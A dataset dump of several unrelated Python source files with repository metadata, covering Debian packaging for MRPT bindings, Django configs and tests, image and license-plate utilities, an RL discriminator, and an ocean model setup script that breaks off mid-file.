Python
|
python/prepare_debian.py
|
zarmomin/mrpt
|
1baff7cf8ec9fd23e1a72714553bcbd88c201966
|
[
"BSD-3-Clause"
] | 1
|
2020-02-01T15:43:00.000Z
|
2020-02-01T15:43:00.000Z
|
python/prepare_debian.py
|
gao-ouyang/mrpt
|
4af5fdf7e45b00be4a64c3d4f009acb9ef415ec7
|
[
"BSD-3-Clause"
] | 1
|
2017-11-30T19:51:29.000Z
|
2018-02-01T08:15:36.000Z
|
python/prepare_debian.py
|
gao-ouyang/mrpt
|
4af5fdf7e45b00be4a64c3d4f009acb9ef415ec7
|
[
"BSD-3-Clause"
] | 2
|
2017-01-12T02:08:10.000Z
|
2018-02-14T23:05:10.000Z
|
#!/usr/bin/env python
import argparse
import os
import platform
import sys
import shutil
import subprocess
DEFAULT_MRPT_VERSION = '1:1.3.0-1'
# args
parser = argparse.ArgumentParser()
parser.add_argument('-b', '--build_dir', help='Path to the build directory.')
parser.add_argument('-m', '--mrpt_version', help='The MRPT lib version those bindings are generated from. DEFAULT: {}'.format(DEFAULT_MRPT_VERSION))
parser.add_argument('-a', '--architecture', required=True, help='The architecture the bindings are built for (i386, amd, armhf, etc.).')
args = parser.parse_args()
# check requirements
def check_required_program(program):
try:
subprocess.call(['which', program])
except:
print 'Required program "{}" not found.'.format(program)
sys.exit(1)
print 'Looking for required programs:'
check_required_program('sudo')
check_required_program('dpkg')
check_required_program('chrpath')
check_required_program('lintian')
# get supplied build path, otherwise set default
if args.build_dir:
build_dir = args.build_dir
else:
build_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'build')
# save current dir
curr_dir = str(os.path.abspath(os.path.curdir))
# find pymrpt.so in build dir
built_lib = os.path.join(build_dir, 'lib', 'pymrpt.so')
if os.path.exists(os.path.join(built_lib)):
print 'Found local build: "{}".'.format(built_lib)
else:
print 'Could not find "pymrpt.so" in {}. Supply path to build directory as argument!'.format(build_dir)
print 'Example: {} <path/to/build>'.format(sys.argv[0])
print '\nExit.'
sys.exit(1)
# TODO find version automatically
built_lib_version = args.mrpt_version if args.mrpt_version else DEFAULT_MRPT_VERSION
built_lib_size = os.path.getsize(built_lib)
built_lib_arch = args.architecture
# user home
home_dir = os.path.expanduser('~')
# packaging dir
pkg_dir = os.path.join(home_dir, 'mrpt-python-bindings')
# check if packaging dir exists
if os.path.exists(pkg_dir):
cont = raw_input('Packaging dir already exists. Continue anyway? (y/N): ')
if cont != 'y':
print '\nExit.'
sys.exit(0)
# remove existing dir (utilizing sudo)
try:
command = 'rm -rf {}'.format(pkg_dir)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
except:
raise
print 'Removed existing packaging dir.'
print 'Preparing:'
print '========='
# create packaging directory
os.mkdir(pkg_dir)
print 'Created packaging dir: "{}".'.format(pkg_dir)
# create DEBIAN directory
deb_dir = os.path.join(pkg_dir, 'DEBIAN')
os.mkdir(deb_dir)
print 'Created DEBIAN dir: "{}".'.format(deb_dir)
# create install directory (utilizing sudo)
inst_dir = os.path.join(pkg_dir, 'usr', 'lib', 'python2.7', 'dist-packages')
try:
command = 'mkdir -p {}'.format(inst_dir)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
except:
raise
print 'Created install dir: "{}".'.format(inst_dir)
# copy local built pymrpt.so to install dir (utilizing sudo)
command = 'cp {} {}'.format(built_lib, inst_dir)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
print 'Copied library file: "{}" to "{}".'.format(built_lib, inst_dir)
# change file permissions
inst_so = os.path.join(inst_dir, 'pymrpt.so')
command = 'chmod 0644 {}'.format(inst_so)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
print 'Changed "{}" permissions to: 0644.'.format(inst_so)
# remove rpath from shared lib
command = 'chrpath -d {}'.format(inst_so)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
print 'Removed RPATH from "{}".'.format(inst_so)
# create control file
control_content = [
'Package: mrpt-python-bindings',
'Version: {}'.format(built_lib_version),
'Architecture: {}'.format(built_lib_arch),
'Maintainer: Peter Rudolph <semael23@gmail.com>',
'Installed-Size: {}'.format(built_lib_size),
'Depends: libmrpt-base1.3, libmrpt-slam1.3, libmrpt-obs1.3, libmrpt-maps1.3, libmrpt-nav1.3, libmrpt-opengl1.3, libmrpt-gui1.3, libboost-python1.54, libc6',
'Section: devel',
'Priority: optional',
'Homepage: https://www.mrpt.org',
'Description: MRPT python bindings.',
' This package contains the python bindings for',
' the Mobile Robot Programming Toolkit (MRPT).',
'' # final new line
]
control_filename = os.path.join(pkg_dir, 'DEBIAN', 'control')
control_file = open(control_filename, 'w+')
control_file.write('\n'.join(control_content))
control_file.close()
print 'Created control file: "{}".'.format(control_filename)
# create copyright file
copyright_content = [
'Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/',
'Upstream-Name: mrpt-python-bindings',
'Upstream-Contact: Peter Rudolph <semael23@gmail.com>',
'Source: https://github.com/MRPT/mrpt',
'',
'Files: *',
'Copyright: 2014-2015 Peter Rudolph',
'License: Expat',
'',
'License: Expat',
' Permission is hereby granted, free of charge, to any person obtaining a copy',
' of this software and associated documentation files (the "Software"), to deal',
' in the Software without restriction, including without limitation the rights',
' to use, copy, modify, merge, publish, distribute, sublicense, and/or sell',
' copies of the Software, and to permit persons to whom the Software is',
' furnished to do so, subject to the following conditions:',
' ',
' The above copyright notice and this permission notice shall be included in',
' all copies or substantial portions of the Software.',
' ',
' THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR',
' IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,',
' FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE',
' AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER',
' LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,',
' OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN',
' THE SOFTWARE.',
'',
]
copyright_filename = os.path.join(pkg_dir, 'DEBIAN', 'copyright')
copyright_file = open(copyright_filename, 'w+')
copyright_file.write('\n'.join(copyright_content))
copyright_file.close()
print 'Created copyright file: "{}".'.format(copyright_filename)
# TODO use auto-generated changelog
changelog_content = [
'python-mrpt-bindings ({}) unstable; urgency=low'.format(built_lib_version),
'',
' * Initial Release.',
'',
' -- Peter Rudolph <semael23@gmail.com> Tue, 20 Jan 2015 12:30:54 +0100',
'',
]
changelog_filename = os.path.join(pkg_dir, 'DEBIAN', 'changelog')
changelog_file = open(changelog_filename, 'w+')
changelog_file.write('\n'.join(changelog_content))
changelog_file.close()
print 'Created changelog file: "{}".'.format(changelog_filename)
os.chdir(home_dir)
# build the package
print 'Build package:'
subprocess.call(['dpkg', '-b', 'mrpt-python-bindings'])
# check package with lintian
print 'Check package:'
subprocess.call(['lintian', os.path.join(home_dir, 'mrpt-python-bindings.deb')])
# go to initial dir
os.chdir(curr_dir)
print 'Done.'
| 35.205882
| 160
| 0.699248
|
4a07bbb5556699727833cc32456b99614745a791
| 509
|
py
|
Python
|
src/software/backend/backend/asgi.py
|
ObaraEmmanuel/votingBooth
|
53cc59e617e0d2b47fbefb48f6e5a096c74f1ad9
|
[
"MIT"
] | 2
|
2021-06-06T05:07:34.000Z
|
2021-08-30T08:56:41.000Z
|
src/software/backend/backend/asgi.py
|
bytecod3/votingBooth
|
6a248833b34885a1d6b62b5d1ee7a60baba769e9
|
[
"MIT"
] | 44
|
2021-05-24T18:43:56.000Z
|
2021-07-29T21:05:02.000Z
|
src/software/backend/backend/asgi.py
|
bytecod3/votingBooth
|
6a248833b34885a1d6b62b5d1ee7a60baba769e9
|
[
"MIT"
] | 3
|
2021-06-05T19:53:32.000Z
|
2021-06-11T11:29:22.000Z
|
"""
ASGI config for backend project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
import dotenv
dotenv.load_dotenv(
os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env')
)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings.production')
application = get_asgi_application()
| 22.130435
| 78
| 0.772102
|
4a07bc300b1d414ac6853b49f920c7bce7cf1d34
| 667
|
py
|
Python
|
app/news.py
|
farzana583/News-API
|
68744239399e79bcd1fceb9d58e825982b359dbd
|
[
"Unlicense"
] | 1
|
2022-03-15T17:01:58.000Z
|
2022-03-15T17:01:58.000Z
|
app/news.py
|
farzana583/News-API
|
68744239399e79bcd1fceb9d58e825982b359dbd
|
[
"Unlicense"
] | null | null | null |
app/news.py
|
farzana583/News-API
|
68744239399e79bcd1fceb9d58e825982b359dbd
|
[
"Unlicense"
] | null | null | null |
class News:
'''
News source class to define sources' objects
'''
def __init__(self,id,name,description,url,category,country):
self.id = id
self.name = name
self.description = description
self.url = url
self.category = category
self.country = country
class NewsArticle:
def __init__(self,id,author,title,description,url,urlToImage,publishedAt,content):
self.id = id
self.author = author
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt
self.content = content
| 29
| 86
| 0.626687
|
4a07bc91545eb2001c7957ac2bdf1058054766e3
| 6,731
|
py
|
Python
|
util/image_comp_tool.py
|
deay0ung/HalloPy
|
652902ed95627496d280eb48f0cef8dade76701d
|
[
"MIT"
] | 60
|
2018-09-01T08:27:32.000Z
|
2022-03-09T21:42:54.000Z
|
util/image_comp_tool.py
|
deay0ung/HalloPy
|
652902ed95627496d280eb48f0cef8dade76701d
|
[
"MIT"
] | 3
|
2019-06-15T10:08:25.000Z
|
2020-04-13T16:34:24.000Z
|
util/image_comp_tool.py
|
deay0ung/HalloPy
|
652902ed95627496d280eb48f0cef8dade76701d
|
[
"MIT"
] | 24
|
2018-09-01T08:27:49.000Z
|
2021-06-15T00:14:04.000Z
|
# import the necessary packages
from skimage.measure import compare_ssim
import numpy as np
import cv2
from hallopy import utils
class ImageTestTool:
"""This class contain tools that helps test functionality"""
@staticmethod
def compare_imaged(img1, img2):
"""This function compare 2 images.
Return SSIM: Represents the structural similarity index between the two input images.
This value can fall into the range [-1, 1] with a value of one being a “perfect match”.
"""
# load the two input images
imageA = img1
imageB = img2
# convert the images to grayscale
grayA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
grayB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)
# compute the Structural Similarity Index (SSIM) between the two
# images, ensuring that the difference image is returned
(score, diff) = compare_ssim(grayA, grayB, full=True)
# diff = (diff * 255).astype("uint8")
return score
# print("SSIM: {}".format(score))
#
# # threshold the difference image, followed by finding contours to
# # obtain the regions of the two input images that differ
# thresh = cv2.threshold(diff, 0, 255,
# cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]
# cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,
# cv2.CHAIN_APPROX_SIMPLE)
# cnts = cnts[0] if imutils.is_cv2() else cnts[1]
#
# # loop over the contours
# for c in cnts:
# # compute the bounding box of the contour and then draw the
# # bounding box on both input images to represent where the two
# # images differ
# (x, y, w, h) = cv2.boundingRect(c)
# cv2.rectangle(imageA, (x, y), (x + w, y + h), (0, 0, 255), 2)
# cv2.rectangle(imageB, (x, y), (x + w, y + h), (0, 0, 255), 2)
#
# # show the output images
# cv2.imshow("Original", imageA)
# cv2.imshow("Modified", imageB)
# cv2.imshow("Diff", diff)
# cv2.imshow("Thresh", thresh)
# cv2.waitKey(0)
@staticmethod
def detect_faces(img):
"""Function for detecting faces.
:returns faces: array with detected faces coordination's.
"""
face_detector = cv2.CascadeClassifier(utils.get_full_path('hallopy/config/haarcascade_frontalface_default.xml'))
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return face_detector.detectMultiScale(gray, 1.3, 5)
@staticmethod
def draw_black_recs(img, obj_coord):
# Black rectangle over faces to remove skin noises.
for (x, y, w, h) in obj_coord:
img[y:y + h, x:x + w, :] = 0
@staticmethod
def clip_roi(img, roi):
clipped = img[0:int(roi['cap_region_y_end'] * img.shape[0]),
int(roi['cap_region_x_begin'] * img.shape[1]):img.shape[1]] # clip the ROI
return clipped
@staticmethod
def get_max_area_contour(input_image):
# Get the contours.
expected_gray = cv2.cvtColor(input_image, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(expected_gray, (41, 41), 0)
thresh = cv2.threshold(blur, 50, 255, cv2.THRESH_BINARY)[1]
thresh = cv2.erode(thresh, None, iterations=2)
thresh = cv2.dilate(thresh, None, iterations=2)
_, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# Find the biggest area
try:
if len(contours) > 0:
max_area_contour = max(contours, key=cv2.contourArea)
return max_area_contour
except ValueError as error:
print(error)
@staticmethod
def get_contour_area(contour):
return cv2.contourArea(contour)
@staticmethod
def get_center_of_mass(contour):
"""Find contours center of mass. """
M = cv2.moments(contour)
if M["m00"] != 0:
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
else:
cX, cY = 0, 0
return cX, cY
@staticmethod
def get_middle_finger_edge_coord(contour):
"""Function for calculating middle finger edge coordination.
:type contour: collection.iter
"""
temp_y = 1000
for point in contour: # find highest point in contour, and track that point
if point[0][1] < temp_y:
temp_y = point[0][1]
return point[0][0], point[0][1]
@staticmethod
def get_contour_extreme_points(contour):
c = contour
try:
# determine the most extreme points along the contour
extLeft = tuple(c[c[:, :, 0].argmin()][0])
extRight = tuple(c[c[:, :, 0].argmax()][0])
extTop = tuple(c[c[:, :, 1].argmin()][0])
extBot = tuple(c[c[:, :, 1].argmax()][0])
except TypeError as error:
extLeft = 0, 0
extRight = 0, 0
extTop = 0, 0
extBot = 0, 0
return extLeft, extRight, extTop, extBot
@staticmethod
def draw_contours(image, contours):
cv2.drawContours(image, [contours], -1, (0, 255, 255), 2)
@staticmethod
def draw_tracking_points(image, points):
# draw the outline of the object, then draw each of the
# extreme points, where the left-most is red, right-most
# is green, top-most is blue, and bottom-most is teal
# determine the most extreme points along the contour
c = points.reshape(-1, 1, 2)
if points.size > 0:
# only ext_contour points have been given.
# ext_left = tuple(c[c[:, :, 0].argmin()][0])
# ext_right = tuple(c[c[:, :, 0].argmax()][0])
ext_top = tuple(c[c[:, :, 1].argmin()][0])
ext_bot = tuple(c[c[:, :, 1].argmax()][0])
# palm_center = points[4]
# cv2.circle(image, ext_left, 8, (0, 0, 255), -1)
# cv2.putText(image,'ext_left',ext_left, cv2.FONT_HERSHEY_COMPLEX, .5, (0, 0, 255))
# cv2.circle(image, ext_right, 8, (0, 255, 0), -1)
# cv2.putText(image,'ext_right',ext_right, cv2.FONT_HERSHEY_COMPLEX, .5, (0, 255, 0))
cv2.circle(image, ext_top, 8, (255, 0, 0), -1)
cv2.putText(image, 'ext_top', ext_top, cv2.FONT_HERSHEY_COMPLEX, .5, (255, 0, 0))
cv2.circle(image, ext_bot, 8, (255, 255, 0), -1)
cv2.putText(image, 'ext_bot', ext_bot, cv2.FONT_HERSHEY_COMPLEX, .5, (255, 255, 0))
# cv2.circle(image, palm_center, 8, (255, 255, 255), thickness=-1)
| 38.244318
| 120
| 0.576883
|
4a07bc9f90286e676d31f9f9a9fb46259f679a93
| 726
|
py
|
Python
|
alipay/aop/api/response/AlipayInsMarketingLifeAccessQueryResponse.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/response/AlipayInsMarketingLifeAccessQueryResponse.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/response/AlipayInsMarketingLifeAccessQueryResponse.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayInsMarketingLifeAccessQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayInsMarketingLifeAccessQueryResponse, self).__init__()
self._access = None
@property
def access(self):
return self._access
@access.setter
def access(self, value):
self._access = value
def parse_response_content(self, response_content):
response = super(AlipayInsMarketingLifeAccessQueryResponse, self).parse_response_content(response_content)
if 'access' in response:
self.access = response['access']
| 27.923077
| 114
| 0.716253
|
4a07bcf7df785e31db1ee115a62ea9309efb4207
| 2,479
|
py
|
Python
|
rlkit/torch/url/discriminator.py
|
hsukyle/rlkit
|
613eaa1a634dd08996557cff966d3be2fa8f78a3
|
[
"MIT"
] | null | null | null |
rlkit/torch/url/discriminator.py
|
hsukyle/rlkit
|
613eaa1a634dd08996557cff966d3be2fa8f78a3
|
[
"MIT"
] | null | null | null |
rlkit/torch/url/discriminator.py
|
hsukyle/rlkit
|
613eaa1a634dd08996557cff966d3be2fa8f78a3
|
[
"MIT"
] | 1
|
2020-10-22T05:05:48.000Z
|
2020-10-22T05:05:48.000Z
|
from rlkit.torch.networks import Mlp
from torch.optim import Adam
import torch.nn as nn
from rlkit.torch.torch_rl_algorithm import np_to_pytorch_batch
from rlkit.util.meter import AverageMeter
from rlkit.torch import pytorch_util as ptu
import torch
from tqdm import tqdm
class Discriminator(Mlp):
def __init__(
self,
*args,
batch_size=256,
num_batches_per_fit=50,
num_skills=20,
sampling_strategy='random',
sampling_window=10,
lr=3e-4,
**kwargs
):
self.save_init_params(locals())
super().__init__(*args, **kwargs)
self.num_skills = num_skills
self.batch_size = batch_size
self.num_batches_per_fit = num_batches_per_fit
self.sampling_strategy = sampling_strategy
self.sampling_window = sampling_window
self.optimizer = Adam(self.parameters(), lr=lr)
self.loss_function_mean = nn.CrossEntropyLoss(reduction='elementwise_mean')
self.loss_function = nn.CrossEntropyLoss(reduction='none')
self.loss_meter = AverageMeter()
def fit(self, replay_buffer):
self.train()
self.loss_meter.reset()
# t = tqdm(range(self.num_batches_per_fit))
t = range(self.num_batches_per_fit)
for i in t:
if self.sampling_strategy == 'random':
batch = replay_buffer.random_batch(self.batch_size)
elif self.sampling_strategy == 'recent':
batch = replay_buffer.recent_batch(self.batch_size, self.sampling_window)
else:
raise ValueError
batch = np_to_pytorch_batch(batch)
inputs = batch['observations']
labels = batch['context'].long()
self.optimizer.zero_grad()
outputs = self.forward(inputs)
loss = self.loss_function_mean(outputs, labels.squeeze(1))
loss.backward()
self.optimizer.step()
self.loss_meter.update(val=loss.item(), n=self.batch_size)
# print(self.loss_meter.avg)
self.eval()
return self.loss_meter.avg
def evaluate_cross_entropy(self, inputs, labels):
with torch.no_grad():
inputs = ptu.from_numpy(inputs)
labels = ptu.from_numpy(labels).long()
logits = self.forward(inputs)
return ptu.get_numpy(self.loss_function(logits, labels.squeeze(1)).unsqueeze(1))
| 34.430556
| 92
| 0.626462
|
4a07be561b737d9a7e9e84ec0ef5c73dbbbe8153
| 3,162
|
py
|
Python
|
app/recipe/tests/test_tags_api.py
|
havenvo/recipe-app-api
|
9c489ece49f7ff131549c0caf193afb8cf6a9cbe
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_tags_api.py
|
havenvo/recipe-app-api
|
9c489ece49f7ff131549c0caf193afb8cf6a9cbe
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_tags_api.py
|
havenvo/recipe-app-api
|
9c489ece49f7ff131549c0caf193afb8cf6a9cbe
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
def setUp(self):
self.client = APIClient()
def test_login_required(self):
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
'test@example.com',
'Test@123'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_limited_to_user(self):
"""Test that tag returns are for the authenticated user"""
user2 = get_user_model().objects.create_user(
'other@example.com',
'Test@123'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='Comfort Food')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_filter_tags_already_assigned_to_recipes(self):
tag1 = Tag.objects.create(user=self.user, name='Lunch')
tag2 = Tag.objects.create(user=self.user, name='Dinner')
recipe = Recipe.objects.create(
user=self.user,
title='Chicken Rice',
time_minutes=20,
price=10.00
)
recipe.tags.add(tag1)
res = self.client.get(TAGS_URL, {'assigned_only': 1})
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1.data, res.data)
self.assertNotIn(serializer2.data, res.data)
def test_retrieve_assigned_return_unique(self):
tag = Tag.objects.create(user=self.user, name='Lunch')
Tag.objects.create(user=self.user, name='Breakfast')
recipe1 = Recipe.objects.create(
user=self.user,
title='Chicken Rice',
time_minutes=15,
price=15.00
)
recipe2 = Recipe.objects.create(
user=self.user,
title='Fried Potato',
time_minutes=15,
price=5.00
)
recipe1.tags.add(tag)
recipe1.refresh_from_db()
recipe2.tags.add(tag)
recipe2.refresh_from_db()
res = self.client.get(TAGS_URL, {'assigned_only': 1})
self.assertEqual(len(res.data), 1)
| 30.699029
| 71
| 0.63599
|
4a07be9921b5382ead26f715329997afdacaf2ec
| 7,745
|
py
|
Python
|
completed_numberplate/Main.py
|
supersetdashboard/eindopdracht
|
0d2b7f4bd9b132c823dae170dffc85451e8b2171
|
[
"Apache-2.0"
] | null | null | null |
completed_numberplate/Main.py
|
supersetdashboard/eindopdracht
|
0d2b7f4bd9b132c823dae170dffc85451e8b2171
|
[
"Apache-2.0"
] | null | null | null |
completed_numberplate/Main.py
|
supersetdashboard/eindopdracht
|
0d2b7f4bd9b132c823dae170dffc85451e8b2171
|
[
"Apache-2.0"
] | null | null | null |
# Main.py
import cv2
import numpy as np
import os
import DetectChars
import DetectPlates
import PossiblePlate
import xlwt
from xlwt import Workbook
wbr = Workbook()
sheet1 = wbr.add_sheet('Sheet 1')
# module level variables ##########################################################################
SCALAR_BLACK = (0.0, 0.0, 0.0)
SCALAR_WHITE = (255.0, 255.0, 255.0)
SCALAR_YELLOW = (0.0, 255.0, 255.0)
SCALAR_GREEN = (0.0, 255.0, 0.0)
SCALAR_RED = (0.0, 0.0, 255.0)
showSteps = False
###################################################################################################
def main(filename):
try:
blnKNNTrainingSuccessful = DetectChars.loadKNNDataAndTrainKNN() # attempt KNN training
if blnKNNTrainingSuccessful == False: # if KNN training was not successful
print("\nerror: KNN traning was not successful\n") # show error message
return # and exit program
# end if
imgOriginalScene = cv2.imread(filename) # open image
if imgOriginalScene is None: # if image was not read successfully
print("\nerror: image not read from file \n\n") # print error message to std out
os.system("pause") # pause so user can see error message
return # and exit program
# end if
listOfPossiblePlates = DetectPlates.detectPlatesInScene(imgOriginalScene) # detect plates
listOfPossiblePlates = DetectChars.detectCharsInPlates(listOfPossiblePlates) # detect chars in plates
# cv2.imshow("imgOriginalScene", imgOriginalScene) # show scene image
if len(listOfPossiblePlates) == 0: # if no plates were found
print("\nno license plates were detected\n") # inform user no plates were found
else: # else
# if we get in here list of possible plates has at leat one plate
# sort the list of possible plates in DESCENDING order (most number of chars to least number of chars)
listOfPossiblePlates.sort(key = lambda possiblePlate: len(possiblePlate.strChars), reverse = True)
# suppose the plate with the most recognized chars (the first plate in sorted by string length descending order) is the actual plate
licPlate = listOfPossiblePlates[0]
# cv2.imshow("imgPlate", licPlate.imgPlate) # show crop of plate and threshold of plate
# cv2.imshow("imgThresh", licPlate.imgThresh)
if len(licPlate.strChars) == 0: # if no chars were found in the plate
print("\nno characters were detected\n\n") # show message
return # and exit program
# end if
drawRedRectangleAroundPlate(imgOriginalScene, licPlate) # draw red rectangle around plate
print("\nlicense plate read from image = " + licPlate.strChars + "\n") # write license plate text to std out
print("----------------------------------------")
writeLicensePlateCharsOnImage(imgOriginalScene, licPlate) # write license plate text on the image
# cv2.imshow("imgOriginalScene", imgOriginalScene) # re-show scene image
# cv2.imwrite("imgOriginalScene.png", imgOriginalScene) # write image out to file
# end if else
cv2.waitKey(0) # hold windows open until user presses a key
return str(licPlate.strChars)
except:
return "not found"
# end main
###################################################################################################
def drawRedRectangleAroundPlate(imgOriginalScene, licPlate):
p2fRectPoints = cv2.boxPoints(licPlate.rrLocationOfPlateInScene) # get 4 vertices of rotated rect
cv2.line(imgOriginalScene, tuple(p2fRectPoints[0]), tuple(p2fRectPoints[1]), SCALAR_RED, 2) # draw 4 red lines
cv2.line(imgOriginalScene, tuple(p2fRectPoints[1]), tuple(p2fRectPoints[2]), SCALAR_RED, 2)
cv2.line(imgOriginalScene, tuple(p2fRectPoints[2]), tuple(p2fRectPoints[3]), SCALAR_RED, 2)
cv2.line(imgOriginalScene, tuple(p2fRectPoints[3]), tuple(p2fRectPoints[0]), SCALAR_RED, 2)
# end function
###################################################################################################
def writeLicensePlateCharsOnImage(imgOriginalScene, licPlate):
ptCenterOfTextAreaX = 0 # this will be the center of the area the text will be written to
ptCenterOfTextAreaY = 0
ptLowerLeftTextOriginX = 0 # this will be the bottom left of the area that the text will be written to
ptLowerLeftTextOriginY = 0
sceneHeight, sceneWidth, sceneNumChannels = imgOriginalScene.shape
plateHeight, plateWidth, plateNumChannels = licPlate.imgPlate.shape
intFontFace = cv2.FONT_HERSHEY_SIMPLEX # choose a plain jane font
fltFontScale = float(plateHeight) / 30.0 # base font scale on height of plate area
intFontThickness = int(round(fltFontScale * 1.5)) # base font thickness on font scale
textSize, baseline = cv2.getTextSize(licPlate.strChars, intFontFace, fltFontScale, intFontThickness) # call getTextSize
# unpack roatated rect into center point, width and height, and angle
( (intPlateCenterX, intPlateCenterY), (intPlateWidth, intPlateHeight), fltCorrectionAngleInDeg ) = licPlate.rrLocationOfPlateInScene
intPlateCenterX = int(intPlateCenterX) # make sure center is an integer
intPlateCenterY = int(intPlateCenterY)
ptCenterOfTextAreaX = int(intPlateCenterX) # the horizontal location of the text area is the same as the plate
if intPlateCenterY < (sceneHeight * 0.75): # if the license plate is in the upper 3/4 of the image
ptCenterOfTextAreaY = int(round(intPlateCenterY)) + int(round(plateHeight * 1.6)) # write the chars in below the plate
else: # else if the license plate is in the lower 1/4 of the image
ptCenterOfTextAreaY = int(round(intPlateCenterY)) - int(round(plateHeight * 1.6)) # write the chars in above the plate
# end if
textSizeWidth, textSizeHeight = textSize # unpack text size width and height
ptLowerLeftTextOriginX = int(ptCenterOfTextAreaX - (textSizeWidth / 2)) # calculate the lower left origin of the text area
ptLowerLeftTextOriginY = int(ptCenterOfTextAreaY + (textSizeHeight / 2)) # based on the text area center, width, and height
# write the text on the image
cv2.putText(imgOriginalScene, licPlate.strChars, (ptLowerLeftTextOriginX, ptLowerLeftTextOriginY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
# end function
###################################################################################################
if __name__ == "__main__":
count=0
imagelist=os.listdir("input")
for img in imagelist:
print(img)
number=(main(f"input/{img}"))
count=count+1
sheet1.write(count, 0, number)
sheet1.write(count, 1, img)
wbr.save("numberplate.xls")
| 41.864865
| 162
| 0.577534
|
4a07bf6a724e005ab50605c7ba553ecde8b4ac50
| 6,850
|
py
|
Python
|
forcing/dot_in/cas6_v3_lo8b/make_dot_in.py
|
parkermac/LiveOcean
|
bef3e1e729ada1069853dd4f57f79f452b54f4fa
|
[
"MIT"
] | 4
|
2015-06-09T18:53:11.000Z
|
2021-08-19T01:39:38.000Z
|
forcing/dot_in/cas6_v3_lo8b/make_dot_in.py
|
parkermac/LiveOcean
|
bef3e1e729ada1069853dd4f57f79f452b54f4fa
|
[
"MIT"
] | null | null | null |
forcing/dot_in/cas6_v3_lo8b/make_dot_in.py
|
parkermac/LiveOcean
|
bef3e1e729ada1069853dd4f57f79f452b54f4fa
|
[
"MIT"
] | 1
|
2017-03-07T01:28:49.000Z
|
2017-03-07T01:28:49.000Z
|
"""
This creates and poulates directories for ROMS runs on gaggle. It is
designed to work with the "BLANK" version of the .in file,
replacing things like $whatever$ with meaningful values.
"""
import os
import sys
fpth = os.path.abspath('../../')
if fpth not in sys.path:
sys.path.append(fpth)
import forcing_functions as ffun
Ldir, Lfun = ffun.intro()
#import netCDF4 as nc
#import numpy as np
from datetime import datetime, timedelta
fdt = datetime.strptime(Ldir['date_string'], '%Y.%m.%d')
fdt_yesterday = fdt - timedelta(1)
print('- dot_in.py creating files for LiveOcean for ' + Ldir['date_string'])
gtag = Ldir['gtag']
gtagex = gtag + '_' + Ldir['ex_name']
EX_NAME = Ldir['ex_name'].upper()
#### USER DEFINED VALUES ####
# which ROMS code to use
roms_name = 'LO_ROMS'
# account for differences when using biology
do_bio = True
multi_core = True # use more than one core
if Ldir['run_type'] == 'backfill':
days_to_run = 1.0
elif Ldir['run_type'] == 'forecast':
days_to_run = float(Ldir['forecast_days'])
# time step in seconds (should fit evenly into 3600 sec)
if Ldir['blow_ups'] == 0:
